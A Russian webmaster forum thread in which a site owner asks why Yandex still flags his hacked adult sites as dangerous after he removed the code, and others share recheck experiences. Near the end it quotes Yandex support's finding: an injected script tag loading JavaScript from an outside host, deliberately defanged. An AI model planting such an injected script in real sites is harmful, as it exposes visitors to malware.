- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Есть два сайта адалт, оба в яндекс.Вебмастер - 23 декабря не понравилась реклама всплывающего окна ICQ и сообщил В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера»..
Код сразу убрал с обоих сайтов и запросил перепроверку, По вашему запросу () выполняется перепроверка сайта, она займет несколько дней.. Но до сих пор никаких изменений.
Стоит ли по адалт сайту писать адурилку или ждать? Перепроверяют Платоны вручную и просто заби(ы)ли? Или что можно сделать?
Спасибо.
Так всё и без изменений, что делать? :( Весь траф с яши шел.
У меня когда-то тоже сайт выводился с пометкой «Этот сайт может угрожать бла-бла-бла...", устранил проблему, и сразу пошёл траф, буквально через пару часов, даже ничего отписать не успел (решил подождать пару дней - может опять фреймы появятся). Сам удивился, но у меня бот яндекса сидел и сидит на сайте постоянно, не знаю как у вас, это я к тому что скорее всего у них это дело на автомате.
Стоит ли по адалт сайту писать адурилку или ждать?
Если на сайте нет ничего криминального (зоо, дп), думаю стОит написать платонам.
Только не "адурилку" :) а тикет.
У меня когда-то тоже сайт выводился с пометкой «Этот сайт может угрожать бла-бла-бла...", устранил проблему, и сразу пошёл траф, буквально через пару часов, даже ничего отписать не успел (решил подождать пару дней - может опять фреймы появятся). Сам удивился, но у меня бот яндекса сидел и сидит на сайте постоянно, не знаю как у вас, это я к тому что скорее всего у них это дело на автомате.
Если на сайте нет ничего криминального (зоо, дп), думаю стОит написать платонам.
Только не "адурилку" :) а тикет.
Спасибо, я написал из панелия яндекс.вебмастер :)
Надеюсь перепроверят :)
Сайт адалт самый обычный.
Ответили, да, действительно, был взломан сайт на ДЛЕ и в кадой новосте в конце присабачен скрипт :(
Почистил, 21 января опять запросил перепроверку, наверное ещё месяц ждать :(
Нет
Быстро пройдет
Обычно 1-2 дня.
Просто вирь у Вас видел, и тормозил по этому прошлый раз.
Нет
Быстро пройдет
Обычно 1-2 дня.
Просто вирь у Вас видел, и тормозил по этому прошлый раз.
Кстати почему то сразу яша не сообщает как Гугл что за вирус.
Но в переписке вот что написали
Приношу свои извинения за длительную задержку. При посещении Вашего сайта сайт.biz антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:
[script language="JavaScript" charset="windows-1251" rel="nofollow" src="h**p://maroder.info/js/if.php?id=2848"][/script]
Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.
Почему Яша сразу не сообщает о коде? Это облегчило бы работу 🚬